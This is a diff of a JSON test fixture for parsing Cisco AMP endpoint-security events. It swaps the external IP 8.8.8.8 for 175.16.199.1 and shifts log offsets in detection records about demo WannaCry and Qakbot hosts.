@@ -2427,7 +2427,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 51525, + "log.offset": 51730, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2436,7 +2436,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2448,7 +2448,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2480,7 +2480,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 52645, + "log.offset": 52855, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2489,7 +2489,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2501,7 +2501,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2541,7 +2541,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 53765, + "log.offset": 53980, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -2552,7 +2552,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -2568,7 +2568,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2608,7 +2608,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 55136, + "log.offset": 55356, "related.hash": [ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "84c82835a5d21bbcf75a61706d8ab549", @@ -2619,7 +2619,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2635,7 +2635,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2676,7 +2676,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 56507, + "log.offset": 56732, "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "process.name": "mssecsvc.exe", "process.pid": 7144, @@ -2690,7 +2690,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2706,7 +2706,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2747,7 +2747,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 58030, + "log.offset": 58260, "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "process.name": "mssecsvc.exe", "process.pid": 7144, @@ -2761,7 +2761,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2777,7 +2777,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2815,7 +2815,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 59553, + "log.offset": 59788, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2824,7 +2824,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2840,7 +2840,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2878,7 +2878,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 60814, + "log.offset": 61054, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2887,7 +2887,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -2903,7 +2903,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2944,7 +2944,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 62075, + "log.offset": 62320, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -2960,7 +2960,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2976,7 +2976,7 @@ "@timestamp": "2021-01-14T19:29:09.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3017,7 +3017,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 63680, + "log.offset": 63930, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -3033,7 +3033,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3049,7 +3049,7 @@ "@timestamp": "2021-01-14T19:10:32.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -3075,13 +3075,13 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 65285, + "log.offset": 65540, "related.hosts": [ "Demo_Qakbot_3" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3093,7 +3093,7 @@ "@timestamp": "2021-01-14T19:10:31.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3119,13 +3119,13 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 66208, + "log.offset": 66468, "related.hosts": [ "Demo_Qakbot_3" ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3137,7 +3137,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3171,7 +3171,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 67131, + "log.offset": 67396, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3180,7 +3180,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3192,7 +3192,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -3226,7 +3226,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 68332, + "log.offset": 68602, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3235,7 +3235,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3247,7 +3247,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3281,7 +3281,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 69533, + "log.offset": 69808, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3290,7 +3290,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3302,7 +3302,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3340,7 +3340,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 70734, + "log.offset": 71014, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3349,7 +3349,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -3361,7 +3361,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3399,7 +3399,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 71990, + "log.offset": 72275, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3408,7 +3408,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3420,7 +3420,7 @@ "@timestamp": "2021-01-14T19:10:30.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3458,7 +3458,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 73246, + "log.offset": 73536, "related.hash": [ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], @@ -3467,7 +3467,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3479,7 +3479,7 @@ "@timestamp": "2021-01-14T18:03:55.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3513,7 +3513,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 74502, + "log.offset": 74797, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], 
@@ -3522,7 +3522,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3534,7 +3534,7 @@ "@timestamp": "2021-01-14T18:03:55.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3573,7 +3573,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 75695, + "log.offset": 75995, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -3587,7 +3587,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -3603,7 +3603,7 @@ "@timestamp": "2021-01-14T18:03:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3644,7 +3644,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 77209, + "log.offset": 77514, "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", @@ -3660,7 +3660,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -3676,7 +3676,7 @@ "@timestamp": "2021-01-14T18:03:52.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3708,7 +3708,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 78808, + "log.offset": 79118, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -3717,7 +3717,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3729,7 +3729,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3763,7 +3763,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 79928, + "log.offset": 80243, "related.hash": [ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], @@ -3772,7 +3772,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3784,7 +3784,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3818,7 +3818,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 81129, + "log.offset": 81449, "related.hash": [ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], 
@@ -3827,7 +3827,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3839,7 +3839,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3871,7 +3871,7 @@ "host.hostname": "Demo_Qakbot_1", "host.name": "Demo_Qakbot_1", "input.type": "log", - "log.offset": 82330, + "log.offset": 82655, "related.hash": [ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], @@ -3880,7 +3880,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3892,7 +3892,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -3930,7 +3930,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 83443, + "log.offset": 83773, "related.hash": [ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], @@ -3939,7 +3939,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -3951,7 +3951,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -3989,7 +3989,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 84690, + "log.offset": 85025, "related.hash": [ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], @@ -3998,7 +3998,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4010,7 +4010,7 @@ "@timestamp": "2021-01-14T17:51:19.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4050,7 +4050,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 85948, + "log.offset": 86288, "related.hash": [ "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", @@ -4061,7 +4061,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4073,7 +4073,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4107,7 +4107,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 87312, + "log.offset": 87657, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4116,7 +4116,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -4128,7 +4128,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4162,7 +4162,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 88505, + "log.offset": 88855, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4171,7 +4171,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4183,7 +4183,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4217,7 +4217,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 89691, + "log.offset": 90046, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4226,7 +4226,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4238,7 +4238,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -4272,7 +4272,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 90884, + "log.offset": 91244, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4281,7 +4281,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4293,7 +4293,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4327,7 +4327,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 92070, + "log.offset": 92435, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4336,7 +4336,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4348,7 +4348,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4382,7 +4382,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 93256, + "log.offset": 93626, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4391,7 +4391,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -4403,7 +4403,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4437,7 +4437,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 94442, + "log.offset": 94817, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4446,7 +4446,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4458,7 +4458,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4492,7 +4492,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 95628, + "log.offset": 96008, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4501,7 +4501,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4513,7 +4513,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -4547,7 +4547,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 96814, + "log.offset": 97199, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4556,7 +4556,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4568,7 +4568,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4602,7 +4602,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 98000, + "log.offset": 98390, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4611,7 +4611,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -4623,7 +4623,7 @@ "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -4657,7 +4657,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 99186, + "log.offset": 99581, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -4666,7 +4666,7 @@ ], "related.ip": [ 